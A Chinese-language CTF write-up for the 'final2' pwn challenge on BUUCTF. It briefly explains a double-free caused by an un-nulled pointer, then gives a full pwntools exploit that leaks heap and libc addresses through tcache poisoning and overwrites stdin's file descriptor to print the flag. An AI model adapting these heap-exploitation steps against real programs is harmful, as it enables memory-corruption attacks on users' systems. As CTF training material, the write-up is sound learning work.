漏洞点:
指针未置零。
利用思路:
利用double_free来泄露堆的地址,随后通过修改tcache的指针的指向,也可以实现修改chunk_size,随后free掉该chunk填满tcache即可泄露libc地址,泄露libc地址以后我们可以找到IO_2_1_stdin_的地址,也就是可以找到stdin的文件描述符,我们通过修改其文件描述符,即可输出flagl了。
exp:
from pwn import *
from LibcSearcher import *
local_file = './final2'
local_libc = './libc-2.27.so'
# remote_libc = './libc-2.23.so'
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn', 29962)
#libc = ELF(remote_libc)
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
buf = 0x555555400000+0x202050
def dbg():
gdb.attach(r)
pause()
menu = b'> '
libc = e.libc
def add(index, num):
sa(b'> ',b'1')
sa(b'>', str(index).encode())
sa(b'your inode number:', str(num).encode())
def delete(index):
sa(menu, b'2')
sa(b'>', str(index).encode())
def show(index):
sa(menu, b'3')
sa(b'>' , str(index).encode())
def leave(message):
sa(menu, b'4')
sa(b'what do you want to say at last? ', message)
add(1,0x30)
delete(1)
add(2,0x20)
add(2,0x20)
add(2,0x20)
add(2,0x20)
delete(2)
add(1,0x30)
delete(2)
show(2)
ru('your short type inode number :')
heap_low_2byte = int(ru('\n'))
if heap_low_2byte < 0:
heap_low_2byte += 0x10000
print('heap_low_2byte=',hex(heap_low_2byte))
add(2,heap_low_2byte - 0xA0)
add(2,0)
delete(1)
add(2,0x30 + 0x20 * 3 + 1)
for i in range(7):
delete(1)
add(2,0)
delete(1)
show(1)
ru('your int type inode number :')
addr = int(ru(b'\n'))
if addr < 0:
addr += 0x100000000
arena = addr -96
base = arena - libc.sym['__malloc_hook']-0x10
success("base:"+hex(base))
addr__IO_2_1_stdin__fileno = base + libc.sym['_IO_2_1_stdin_'] + 0x70
add(2, addr__IO_2_1_stdin__fileno)
add(1, 0)
add(1,666)
sa('which command?',b'4')
r.interactive()